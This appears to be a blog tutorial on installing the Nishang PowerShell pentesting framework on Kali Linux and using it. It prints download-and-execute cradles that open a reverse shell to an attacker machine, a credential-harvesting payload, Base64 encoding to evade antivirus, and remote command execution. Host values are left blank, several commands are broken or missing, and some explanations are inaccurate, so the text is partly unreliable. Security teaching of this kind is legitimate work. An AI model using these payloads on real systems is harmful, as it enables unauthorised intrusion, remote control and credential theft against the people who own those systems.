Nishang$ Pentesting Tools and Techniques
# Nishang$ Pentesting Tools and Techniques## Installation and Configuration on Kali LinuxNishang is a powerful PowerShell-based framework designed for penetration testing and red teaming. It provides a variety of scripts and payloads that allow testers to execute attacks using the Windows operating system. In this section, we will cover how to install and configure Nishang on Kali Linux, followed by step-by-step usage and technical explanations.### Step 1: Install DependenciesBefore installing Nishang, ensure that your Kali Linux is fully up to date. Open your terminal and run:
sudo apt update && sudo apt upgrade -y
Next, we need to install Git if it isn’t already installed. Run the following command:
### Step 2: Clone the Nishang RepositoryNow we can clone the Nishang repository from GitHub. Execute the following command:
git clone https://github.com/samratashok/nishang.git
This command will create a directory named `nishang` containing the framework's scripts.### Step 3: Navigate to the Nishang DirectoryChange into the `nishang` directory:
### Step 4: ConfigurationNishang scripts primarily run on Windows, so you’ll have to set up a Windows environment for effective testing. You can use tools like Wine for running some PowerShell scripts; however, for a more authentic experience, using a Windows VM is recommended.For those who need to run PowerShell scripts from Kali, ensure PowerShell is installed on your Windows environment. To check if PowerShell is installed, open your PowerShell terminal and type:[/dm_code_snippet]powershell
$PSVersionTable.PSVersion
[/dm_code_snippet]Ensure that your PowerShell version is at least 5.0 to utilize most of Nishang's capabilities.## Step-by-Step Usage and Real-World Use CasesNishang provides various capabilities, ranging from weaponizing payloads to exploitation techniques. In this segment, we will explore several key functionalities, complete with code examples and real-world use cases.### Example 1: Basic Reverse Shell PayloadOne of the most common uses for Nishang is to create a reverse shell. Here is a simple example of how you can use Nishang to do this.1. **Select the Payload**: Navigate to the `Payloads` directory within Nishang.
2. **Execute the Reverse Shell Script**: Use the script `Invoke-PowerShellTcp.ps1` to generate the reverse shell.[/dm_code_snippet]powershell
powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://
:/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress -Port "
[/dm_code_snippet]This command will connect back to your attacking machine, allowing for remote access.### Example 2: Credential HarvestingNishang can also be used for credential harvesting through phishing or exploiting local user sessions. Here's an example of how you might use it to create a credential harvesting payload:1. **Use the Credential Harvester Script**:[/dm_code_snippet]powershell
powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://:/Invoke-CredentialHarvesting.ps1'); Invoke-CredentialHarvesting"
[/dm_code_snippet]This command sets up a listener that captures user credentials when they attempt to log into a target service.### Example 3: Bypassing Anti-VirusWhen utilizing Nishang, it is imperative to consider anti-virus software. Many of the scripts can be flagged as malicious. To bypass these systems, you might want to obfuscate your PowerShell commands.1. **Obfuscation Technique**:[/dm_code_snippet]powershell
$cmd = "Invoke-PowerShellTcp -Reverse -IPAddress -Port "
$enc = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cmd))
powershell -EncodedCommand $enc
[/dm_code_snippet]By encoding your script, you can avoid detection by many standard intrusion detection systems.### Example 4: Executing Commands RemotelyNishang also allows you to execute arbitrary commands on target systems, which is crucial for gaining further access or information.1. **Invoke-Expression Script**:[/dm_code_snippet]powershell
powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://:/Invoke-Expression.ps1'); Invoke-Expression 'whoami'"
[/dm_code_snippet]This command will remotely execute the `whoami` command on the target machine.## Detailed Technical Explanations and External Reference Links### PowerShell BasicsPowerShell is a task automation and configuration management framework from Microsoft, consisting of a command-line shell and associated scripting language. Nishang takes advantage of PowerShell's capabilities to execute commands and scripts seamlessly.For further reading on PowerShell fundamentals, check out the following resources:– [PowerShell Documentation](https://docs.microsoft.com/en-us/powershell/)
– [Getting Started with PowerShell](https://docs.microsoft.com/en-us/powershell/scripting/learn/getting-started/getting-started-with-windows-powershell?view=powershell-7.1)### Understanding Nishang ArchitectureNishang is designed around various modules, each targeting a specific aspect of penetration testing. The framework is modular, allowing you to utilize only what you need for your testing environment.### Advanced Payload CreationCreating your own payloads can enhance your effectiveness as a pentester. Nishang allows customization of existing payloads or the creation of entirely new ones.For detailed guidelines on payload creation, refer to the following:– [Building Your First Payload](https://www.pentesterlab.com/exercises/payloads)## ConclusionNishang provides ethical hackers and pentesters with a robust suite of tools for exploiting PowerShell vulnerabilities in Windows systems. From reverse shells to credential harvesting techniques, Nishang enables a wide array of attacks that can be employed in real-world scenarios. Understanding how to effectively install, configure, and utilize these tools is essential for any cybersecurity professional.By mastering Nishang, you are adding a powerful weapon to your arsenal and enhancing your capability to identify, exploit, and remediate vulnerabilities in target environments.—Made by pablo rotem / פבלו רותם